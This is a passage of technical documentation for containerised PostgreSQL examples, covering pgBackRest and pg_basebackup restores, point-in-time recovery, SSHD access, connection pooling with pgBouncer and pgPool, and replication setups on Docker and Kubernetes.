It should be left running, and a\npgBackRest backup must already have been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore container with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running, but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore container with pgBackRest configured for full restore\n * New Volume for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running, but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore container with pgBackRest configured for delta restore\n\npgBackRest will restore missing files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/delta\n.\/post-restore.sh\n....\n\n=== pgBackRest with SSHD\n\nThe PostgreSQL and PostgreSQL GIS containers can enable an SSH daemon to allow developers\nto do DBA tasks on the database server without the need for exec privileges. An administrator\nwho deploys the SSHD-enabled PostgreSQL database can specify the authorized public keys for\naccess to the database server.\n\nIn order to activate SSHD in the PostgreSQL containers, the following files need to be\nmounted to the PostgreSQL container:\n\n- SSH Host keys mounted on the \/sshd volume. Three keys are required:\n\n * ssh_host_rsa_key\n * ssh_host_ecdsa_key\n * ssh_host_ed25519_key\n\n- sshd_config mounted on the \/pgconf volume\n- authorized_keys mounted on the \/pgconf volume\n\nSSHD can be enabled in the PostgreSQL containers by setting the following environment variable:\n....\nENABLE_SSHD=true\n....\n\nThe *authorized_keys* file is mounted on the *\/pgconf* directory. 
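\n\nAs for the host keys listed earlier, if you need to produce your own, standard `ssh-keygen` invocations can generate them (a sketch; the file names match the required list above):\n\n....\n# generate passphrase-less host keys of each required type\nssh-keygen -t rsa -N '' -f ssh_host_rsa_key\nssh-keygen -t ecdsa -N '' -f ssh_host_ecdsa_key\nssh-keygen -t ed25519 -N '' -f ssh_host_ed25519_key\n....\n\n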
In order to support\nusing the *\/pgconf* mount for authentication, the following must be set in *sshd_config*:\n....\nAuthorizedKeysFile \/pgconf\/authorized_keys\nStrictModes no\n....\n\nFor OpenShift deployments, the following configuration needs to be set in *sshd_config*:\n....\nUsePAM no\n....\n\n==== Docker\n\nStart the example as follows:\n\n....\ncd $CCPROOT\/examples\/docker\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * A volume named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys files\n * A volume named sshd containing the SSH Host keys\n * postgres-sshd container with pgbackrest archiving and sshd enabled. An initial stanza named *db* will be created on initialization\n\nAfter running the example, SSH to the container using the forwarded port 2022:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@0.0.0.0\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * A configMap named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys files\n * A secret named sshd-secrets containing the SSH Host keys\n * postgres-sshd pod with pgbackrest archiving and sshd enabled. An initial stanza named *db* will be created on initialization\n * postgres-sshd service with port 2022 for SSH\n\nAfter running the example, SSH to the service using the postgres-sshd service available in Kubernetes:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd\n....\n\n==== Using pgBackRest via SSH\n\nIf a pgbackrest.conf file is located on the \/pgconf volume and archiving is enabled, it's possible to\nrun backups using the pgBackRest utility.\n\nWith the SSHD service running, the following command will issue a pgBackRest backup:\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest --stanza=db backup\n....\n\nTo list all the available pgBackRest backups, run the following:\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest info\n....\n\n=== pg_basebackup\n\nThe script assumes you are going to back up the *primary*\ncontainer created in the first example, so you need to ensure\nthat container is running. This example assumes you have configured storage as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration documentation]. Things to point out with this example\ninclude its use of persistent volumes and volume claims to store the backup data files.\n\nA successful backup will perform `pg_basebackup` on the *primary* container and store\nthe backup in the `$CCP_STORAGE_PATH` volume under a directory named `primary-backups`. Each\nbackup will be stored in a subdirectory with a timestamp as the name, allowing any number of backups to be kept.\n\nThe backup script will do the following:\n\n* Start up a backup container named backup\n* Run `pg_basebackup` on the container named *primary*\n* Store the backup in the `\/tmp\/backups\/primary-backups` directory\n* Exit after the backup\n\nWhen you are ready to restore from the backup, the restore example runs a PostgreSQL container\nusing the backup location. 
Upon initialization, the container will use rsync to copy the backup\ndata to this new container and then launch PostgreSQL using the original backed-up data.\n\nThe restore script will do the following:\n\n* Start up a container named *restore*\n* Copy the backup files from the previous backup example into `\/pgdata`\n* Start up the container using the backup files\n* Map the PostgreSQL port of 5432 in the container to your local host port of 12001\n\nTo shut down the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/backup\n.\/run.sh\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specify a backup path for this example. To get the correct path,\ncheck the `backup` job logs for the timestamp:\n\n....\ndocker logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH is as follows:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nWhen you are ready to restore from the backup created, run the following example:\n....\ncd $CCPROOT\/examples\/docker\/restore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/backup\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specify a backup path for this example. To get the correct path,\ncheck the `backup` job logs for the timestamp:\n....\nkubectl logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH defined as a variable within the JSON script is as follows:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/restore\n.\/run.sh\n....\n\nTest the restored database as follows:\n....\npsql -h restore -U postgres postgres\n....\n\n=== Point in Time Recovery (PITR)\n\nPITR (point-in-time recovery) is a feature that allows for recreating a database\nfrom backup and log files at a certain point in time. This is done using a write\nahead log (WAL), which is kept in the `pg_wal` directory within `PGDATA`. Changes\nmade to the database files over time are recorded in these log files, which allows\nthem to be used for disaster recovery purposes.\n\nWhen using PITR as a backup method, in order to restore from the last checkpoint in\nthe event of a database or system failure, it is only necessary to save these log\nfiles plus a full backup. 
This provides an additional advantage in that it is not\nnecessary to keep multiple full backups on hand, which consume space and time to create.\nThis is because point in time recovery allows you to \"replay\" the log files and recover\nyour database to any point since the last full backup.\n\nMore detailed information about Write Ahead Log (WAL) archiving can be found\nlink:https:\/\/www.postgresql.org\/docs\/10\/static\/continuous-archiving.html[here.]\n\nBy default in the crunchy-postgres container, WAL logging is *not* enabled.\nTo enable WAL logging *outside of this example*, set the following environment\nvariables when starting the crunchy-postgres container:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\n....\n\nThese variables set the same-named settings within the `postgresql.conf`\nfile that is used by the database. When set, WAL files generated by the database\nwill be written out to the `\/pgwal` mount point.\n\nA full backup is required to do a PITR. Within the example, crunchy-backup\nperforms this role by running a `pg_basebackup` on the database. After a backup\nis performed, logic within crunchy-postgres checks on startup whether a PITR\nshould be performed.\n\nThere are three volume mounts used with the PITR example:\n\n* `\/recover` - When specified within a crunchy-postgres container, PITR is activated during container startup.\n* `\/backup` - This is used to find the base backup you want to recover from.\n* `\/pgwal` - This volume is used to write out new WAL files from the newly restored database container.\n\nThe following environment variables manipulate the point in time recovery logic:\n\n* The `RECOVERY_TARGET_NAME` environment variable tells the PITR logic the name of the recovery target.\n* `RECOVERY_TARGET_TIME` is an optional environment variable that restores to a known timestamp.\n\nIf you don't specify either of these environment variables, then the PITR logic will assume you want to\nrestore using all the WAL files, that is, to the last known recovery point.\n\nThe `RECOVERY_TARGET_INCLUSIVE` environment variable is also available to\nlet you control the `recovery.conf` setting `recovery_target_inclusive`.\nIf you do not set this environment variable, the default is *true*.\n\nOnce you recover a database using PITR, it will be in read-only mode. To\nmake the database resume as a writable database, run the following SQL command:\n....\npostgres=# select pg_wal_replay_resume();\n....\n\n{{% notice tip %}}\nIf you're running the PITR example for *PostgreSQL versions 9.5 or 9.6*, please note that\nstarting in PostgreSQL version 10, the `pg_xlog` directory was renamed to `pg_wal`. Additionally, all usages\nof the function `pg_xlog_replay_resume` were changed to `pg_wal_replay_resume`.\n{{% \/notice %}}\n\nIt takes about 1 minute for the database to become ready for use after initially starting.\n\n{{% notice warning %}}\nWAL segment files are written to the *\/tmp* directory. 
Leaving the example running\nfor a long time could fill up your \/tmp directory.\n{{% \/notice %}}\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate a database container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pitr\n.\/run-pitr.sh\n....\n\nNext, we will create a base backup of that database using this:\n....\n.\/run-backup-pitr.sh\n....\n\nAfter creating the base backup of the database, WAL segment files are created every 60 seconds\nthat contain any database changes. These segments are stored in the\n`\/tmp\/pitr\/pitr\/pg_wal` directory.\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments. These labels can be\nused to mark the points in the recovery process that will be referenced when\ncreating the restored database.\n\nNext, now that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\ndocker stop pitr\n....\n\nNext, let's edit the restore script to use the base backup files\ncreated in the step above. You can view the backup path name\nunder the `\/tmp\/backups\/pitr-backups\/` directory. You will see\nanother directory inside of this path with a name similar to\n`2018-03-21-21-03-29`. Copy and paste that value into the\n`run-restore-pitr.sh` script in the `BACKUP` environment variable.\n\nAfter that, run the script.\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nThe WAL segments are read and applied when restoring from the database\nbackup. At this point, you should be able to verify that the\ndatabase was restored to the point before creating the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\n....\n\nThis SQL command should show that the pitrtest table does not exist\nat this recovery time. The output should be similar to:\n....\nERROR: relation \"pitrtest\" does not exist\n....\n\nPostgreSQL allows you to pause the recovery process if the target name\nor time is specified. This pause would allow a DBA a chance to review\nthe recovery time\/name and see if this is what they want or expect. If so,\nthe DBA can run the following command to resume and complete the recovery:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nUntil you run the statement above, the database will be left in read-only\nmode.\n\nNext, run the script to restore the database\nto the `afterchanges` restore point. Update the `RECOVERY_TARGET_NAME` to `afterchanges`:\n....\nvi .\/run-restore-pitr.sh\n.\/run-restore-pitr.sh\n....\n\nAfter this restore, you should be able to see the test table:\n....\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'select pg_wal_replay_resume()'\n....\n\nLastly, start a recovery using all of the WAL files. This will get the\nrestored database as current as possible. 
To do so, edit the script\nto remove the `RECOVERY_TARGET_NAME` environment setting completely:\n....\n.\/run-restore-pitr.sh\nsleep 30\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'table pitrtest'\npsql -h 127.0.0.1 -p 12001 -U postgres postgres -c 'create table foo (id int)'\n....\n\nAt this point, you should be able to create new data in the restored database\nand the test table should be present. When you recover the entire\nWAL history, resuming the recovery is not necessary to enable writes.\n\n==== Kubernetes and OpenShift\n\nStart by running the example database container:\n....\ncd $CCPROOT\/examples\/kube\/pitr\n.\/run-pitr.sh\n....\n\nThis step will create a database container, *pitr*. This\ncontainer is configured to continuously write WAL segment files\nto a mounted volume (`\/pgwal`).\n\nAfter you start the database, you will create a base backup\nusing this command:\n....\n.\/run-backup-pitr.sh\n....\n\nThis will create a backup and write the backup files to a persistent\nvolume (`\/pgbackup`).\n\nNext, create some recovery targets within the database by running\nthe SQL commands against the *pitr* database as follows:\n....\n.\/run-sql.sh\n....\n\nThis will create recovery targets named `beforechanges`, `afterchanges`, and\n`nomorechanges`. It will create a table, *pitrtest*, between\nthe `beforechanges` and `afterchanges` targets. It will also run a SQL\n`CHECKPOINT` to flush out the changes to WAL segments.\n\nNow that we have a base backup and a set of WAL files containing\nour database changes, we can shut down the *pitr* database\nto simulate a database failure. Do this by running the following:\n....\n${CCP_CLI} delete pod pitr\n....\n\nNext, we will create 3 different restored database containers based\nupon the base backup and the saved WAL files.\n\nFirst, get the BACKUP_PATH created by the `backup-pitr` example by viewing the pod's logs:\n\n....\n${CCP_CLI} logs backup-pitr-8sfkh | grep PATH\nThu May 10 18:07:58 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/pitr-backups\/2018-05-10-18-07-58.\n....\n\nEdit the `restore-pitr.json` file and change the `BACKUP_PATH` environment variable\nusing the path discovered above (note: `\/pgdata\/` is not required and should be excluded\nfrom the variable):\n\n....\n{\n \"name\": \"BACKUP_PATH\",\n \"value\": \"pitr-backups\/2018-05-10-18-07-58\"\n}\n....\n\nNext, we restore prior to the `beforechanges` recovery target. This\nrecovery point is *before* the *pitrtest* table is created.\n\nEdit the `restore-pitr.json` file, and edit the environment\nvariable to indicate we want to use the `beforechanges` recovery\npoint:\n....\n{\n \"name\": \"RECOVERY_TARGET_NAME\",\n \"value\": \"beforechanges\"\n}\n....\n\nThen run the following to create the restored database container:\n....\n.\/run-restore-pitr.sh\n....\n\nAfter the database has been restored, you should be able to perform\na test to see if the recovery worked as expected:\n....\npsql -h restore-pitr -U postgres postgres -c 'table pitrtest'\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nThe output of these commands should show that the *pitrtest* table is not\npresent.
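\n\nFor example, the query against *pitrtest* should fail with output similar to the following (the exact wording can vary by PostgreSQL version):\n....\nERROR: relation \"pitrtest\" does not exist\n....\n\n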
It should also show that you cannot create a new table\nbecause the database is paused in read-only mode.\n\nTo make the database resume as a writable database, run the following\nSQL command:\n....\nselect pg_wal_replay_resume();\n....\n\nIt should then be possible to write to the database:\n....\npsql -h restore-pitr -U postgres postgres -c 'create table foo (id int)'\n....\n\nYou can also test that, if `afterchanges` is specified, the\n*pitrtest* table is present but the database is still in recovery\nmode.\n\nLastly, you can test a full recovery using *all* of the WAL files, if\nyou remove the `RECOVERY_TARGET_NAME` environment variable completely.\n\nThe storage portions of this example can all be found under `$CCP_STORAGE_PATH`.\n\n== Connection Pooling\n\n=== pgBouncer\n\nCrunchy pgBouncer is a lightweight connection pooler for PostgreSQL databases.\n\nThe following examples create the following containers:\n\n * pgBouncer Primary\n * pgBouncer Replica\n * PostgreSQL Primary\n * PostgreSQL Replica\n\nIn Kubernetes and OpenShift, this example will also create:\n\n * pgBouncer Primary Service\n * pgBouncer Replica Service\n * Primary Service\n * Replica Service\n * PostgreSQL Secrets\n * pgBouncer Secrets\n\nTo clean up the objects created by this example, run the following in the `pgbouncer` example directory:\n\n....\n.\/cleanup.sh\n....\n\n{{% notice tip %}}\nFor more information on `pgBouncer`, see the link:https:\/\/pgbouncer.github.io[official website].\n{{% \/notice %}}\n\n==== Docker\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/docker\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h 0.0.0.0 -p 6432 -U testuser\npsql -d userdb -h 0.0.0.0 -p 6433 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h 0.0.0.0 -p 6432 -U pgbouncer\npsql -d pgbouncer -h 0.0.0.0 -p 6433 -U pgbouncer\n....\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nOpenShift: If custom configurations aren't being mounted, an *emptydir* volume is required\nto be mounted at `\/pgconf`.\n{{% \/notice %}}\n\nRun the `pgbouncer` example:\n....\ncd $CCPROOT\/examples\/kube\/pgbouncer\n.\/run.sh\n....\n\nOnce all containers have deployed and are ready for use, `psql` to the target\ndatabases through `pgBouncer`:\n\n....\npsql -d userdb -h pgbouncer-primary -p 6432 -U testuser\npsql -d userdb -h pgbouncer-replica -p 6432 -U testuser\n....\n\nTo connect to the administration database within `pgbouncer`, connect using `psql`:\n\n....\npsql -d pgbouncer -h pgbouncer-primary -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\npsql -d pgbouncer -h pgbouncer-replica -p 6432 -U pgbouncer -c \"SHOW SERVERS\"\n....\n\n=== pgPool II\n\nAn example is provided that will run a *pgPool II* container in conjunction with the\n*primary-replica* example provided above.\n\nYou can execute both `INSERT` and `SELECT` statements after connecting to pgpool.\nThe container directs `INSERT` statements to the primary, while `SELECT` statements\nare sent round-robin to both the primary and the replica.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the nodes that pgpool is configured for by running:\n....\npsql -h pgpool -U testuser userdb -c 'show pool_nodes'\n....\n\nTo shutdown the instance and remove the container for each
example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nCreate the container as follows:\n....\ncd $CCPROOT\/examples\/docker\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database:\n....\npsql -h localhost -U testuser -p 12003 userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy the pgpool service:\n....\ncd $CCPROOT\/examples\/kube\/pgpool\n.\/run.sh\n....\n\nThe example is configured to allow the *testuser* to connect\nto the *userdb* database:\n....\npsql -h pgpool -U testuser userdb\n....\n\n== Database\n\n=== Single Primary\n\nThis example starts a single PostgreSQL container and service; it is the simplest\nof the examples.\n\nThe container creates a default database called *userdb*, a default user called *testuser*\nand a default password of *password*.\n\nFor all environments, the script additionally creates:\n\n * A persistent volume claim\n * A crunchy-postgres container named *primary*\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * A pod named *primary*\n * A service named *primary*\n * A PVC named *primary-pgdata*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nTo create the example:\n....\ncd $CCPROOT\/examples\/kube\/primary\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h primary -U postgres postgres\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this\nexample using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary\/README.md[here].\n\n=== PostgreSQL Deployment\n\nStarting in release 1.2.8, the PostgreSQL container can accept\nan environment variable named `PGDATA_PATH_OVERRIDE`. If set,\nthe `\/pgdata\/subdir` path will use a subdirectory name of your\nchoosing instead of the default, which is the hostname of the container.\n\nThis example shows how a Deployment of a PostgreSQL primary is\nsupported. A deployment's pod uses a hostname generated by\nKubernetes; because of this, a new hostname will be assigned upon\nrestart of the primary pod.\n\nTo find the `\/pgdata` directory that pertains to the pod, you will need\nto specify a `\/pgdata\/subdir` name that never changes.
This requirement is\nhandled by the `PGDATA_PATH_OVERRIDE` environment variable.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nThis example will create the following in your Kubernetes and OpenShift environments:\n\n * primary and replica services\n * primary-deployment deployment\n * replica-deployment statefulset\n * ConfigMap to hold a custom `postgresql.conf`, `setup.sql`, and\n `pg_hba.conf` files\n * Secrets for the primary user, superuser, and normal user to\n hold the passwords\n * Volume mount for `\/backrestrepo` and `\/pgwal`\n\nThe persisted data for the PostgreSQL primary is found under `\/pgdata\/primary-deployment`.\nIf you delete the primary pod, the deployment will create another\npod for the primary and will be able to start up immediately since\nit works out of the same `\/pgdata\/primary-deployment` data directory.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/primary-deployment\n.\/run.sh\n....\n\nTo scale the replica statefulset, run the following command:\n\n....\n${CCP_CLI?} scale --replicas=2 statefulset replica-deployment\n....\n\n{{% notice warning %}}\nThis example only creates enough Persistent Volumes for a maximum of 2 replicas.\nIf you are not using storage classes, the maximum amount of replicas this example can\nbe scaled to is 2.\n{{% \/notice %}}\n\n=== Replication\n\nThis example starts a primary and a replica pod containing a PostgreSQL database.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nFor the Docker environment, the script additionally creates:\n\n * A docker volume using the local driver for the primary\n * A docker volume using the local driver for the replica\n * A container named *primary* binding to port 12007\n * A container named *replica* binding to port 12008\n * A mapping of the PostgreSQL port 5432 within the container to the localhost port 12000\n * The database using predefined environment variables\n\nAnd specifically for the Kubernetes and OpenShift environments:\n\n * emptyDir volumes for persistence\n * A pod named *pr-primary*\n * A pod named *pr-replica*\n * A pod named *pr-replica-2*\n * A service named *pr-primary*\n * A service named *pr-replica*\n * The database using predefined environment variables\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo create the example and run the container:\n....\ncd $CCPROOT\/examples\/docker\/primary-replica\n.\/run.sh\n....\n\nConnect from your local host as follows:\n....\npsql -h localhost -p 12007 -U testuser -W userdb\npsql -h localhost -p 12008 -U testuser -W userdb\n....\n\n==== Kubernetes and OpenShift\n\nRun the following command to deploy a primary and replica database cluster:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica\n.\/run.sh\n....\n\nIt takes about a minute for the replica to begin replicating with the\nprimary. To test out replication, see if replication is underway\nwith this command:\n\n....\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'table pg_stat_replication'\n....\n\nIf you see a line returned from that query it means the primary is replicating\nto the replica. 
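\n\nIf you prefer a narrower view, you can select just the most useful columns. This is a minimal sketch; the columns used here are standard `pg_stat_replication` columns in recent PostgreSQL releases:\n....\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'select usename, application_name, state, sync_state from pg_stat_replication'\n....\n\n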
Try creating some data on the primary:\n\n....\n\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'create table foo (id int)'\n${CCP_CLI?} exec -ti pr-primary -- psql -d postgres -c 'insert into foo values (1)'\n....\n\nThen verify that the data is replicated to the replica:\n\n....\n${CCP_CLI?} exec -ti pr-replica -- psql -d postgres -c 'table foo'\n....\n\n*primary-replica-dc*\n\nIf you wanted to experiment with scaling up the number of replicas, you can run the following example:\n\n....\ncd $CCPROOT\/examples\/kube\/primary-replica-dc\n.\/run.sh\n....\n\nYou can verify that replication is working using the same commands as above.\n\n....\n${CCP_CLI?} exec -ti primary-dc -- psql -d postgres -c 'table pg_stat_replication'\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to run this example\nusing Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/primary-replica\/README.md[here].\n\n=== Synchronous Replication\n\nThis example deploys a PostgreSQL cluster with a primary, a synchronous replica, and\nan asynchronous replica. The two replicas share the same service.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/sync\n.\/run.sh\n....\n\nYou can test the replication status on the primary by using the following command\nand the password *password*:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'table pg_stat_replication'\n....\n\nYou should see 2 rows; 1 for the asynchronous replica and 1 for the synchronous replica. The\n`sync_state` column shows values of async or sync.\n\nYou can test replication to the replicas by first entering some data on\nthe primary, and secondly querying the replicas for that data:\n....\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'create table foo (id int)'\npsql -h 127.0.0.1 -p 12010 -U postgres postgres -c 'insert into foo values (1)'\npsql -h 127.0.0.1 -p 12011 -U postgres postgres -c 'table foo'\npsql -h 127.0.0.1 -p 12012 -U postgres postgres -c 'table foo'\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/sync\n.\/run.sh\n....\n\nConnect to the *primarysync* and *replicasync* databases as follows for both the\nKubernetes and OpenShift environments:\n....\npsql -h primarysync -U postgres postgres -c 'create table test (id int)'\npsql -h primarysync -U postgres postgres -c 'insert into test values (1)'\npsql -h primarysync -U postgres postgres -c 'table pg_stat_replication'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\npsql -h replicasync -U postgres postgres -c 'select inet_server_addr(), * from test'\n....\n\nThis set of queries will show you the IP address of the PostgreSQL replica\ncontainer. Note the changing IP address due to the round-robin service proxy\nbeing used for both replicas. The example queries also show that both\nreplicas are replicating successfully from the primary.\n\n=== Statefulsets\n\nThis example deploys a statefulset named *statefulset*. The statefulset\nis a new feature in Kubernetes as of version 1.5 and in OpenShift Origin as of\nversion 3.5. 
Statefulsets have replaced PetSets going forward.\n\nPlease view link:https:\/\/kubernetes.io\/docs\/concepts\/abstractions\/controllers\/statefulsets\/[this Kubernetes description]\nto better understand what a Statefulset is and how it works.\n\nThis example creates 2 PostgreSQL containers to form the set. At\nstartup, each container will examine its hostname to determine\nif it is the first container within the set of containers.\n\nThe first container is determined by the hostname suffix assigned\nby Kubernetes to the pod. This is an ordinal value starting with *0*.\nIf a container sees that it has an ordinal value of *0*, it will\nupdate the container labels to add a new label of:\n....\nname=$PG_PRIMARY_HOST\n....\n\nIn this example, `PG_PRIMARY_HOST` is specified as `statefulset-primary`.\n\nBy default, the containers specify a value of `name=statefulset-replica`.\n\nThere are 2 services that end-user applications will use to\naccess the PostgreSQL cluster: one service (statefulset-primary) routes to the primary\ncontainer and the other (statefulset-replica) routes to the replica containers.\n....\n$ ${CCP_CLI} get service\nNAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE\nkubernetes 10.96.0.1 <none> 443\/TCP 22h\nstatefulset None <none> 5432\/TCP 1h\nstatefulset-primary 10.97.168.138 <none> 5432\/TCP 1h\nstatefulset-replica 10.97.218.221 <none> 5432\/TCP 1h\n....\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/statefulset\n.\/run.sh\n....\n\nYou can access the primary database as follows:\n....\npsql -h statefulset-primary -U postgres postgres\n....\n\nYou can access the replica databases as follows:\n....\npsql -h statefulset-replica -U postgres postgres\n....\n\nYou can scale the number of containers using this command; this will\nessentially create an additional replica database.\n....\n${CCP_CLI} scale --replicas=3 statefulset statefulset\n....\n\n==== Helm\n\nThis example resides under the `$CCPROOT\/examples\/helm` directory. View the README to\nrun this example using Helm link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/master\/examples\/helm\/statefulset\/README.md[here].\n\n=== Geospatial (PostGIS)\n\nAn example is provided that will run a PostgreSQL with PostGIS pod and service in Kubernetes and OpenShift, and a container in Docker.\n\nThe container creates a default database called *userdb*, a default user called\n*testuser* and a default password of *password*.\n\nYou can view the extensions that postgres-gis has enabled by running the following command and viewing the listed PostGIS packages:\n....\npsql -h postgres-gis -U testuser userdb -c '\\dx'\n....\n\nTo validate that PostGIS is installed and which version is running, run the command:\n\n....\npsql -h 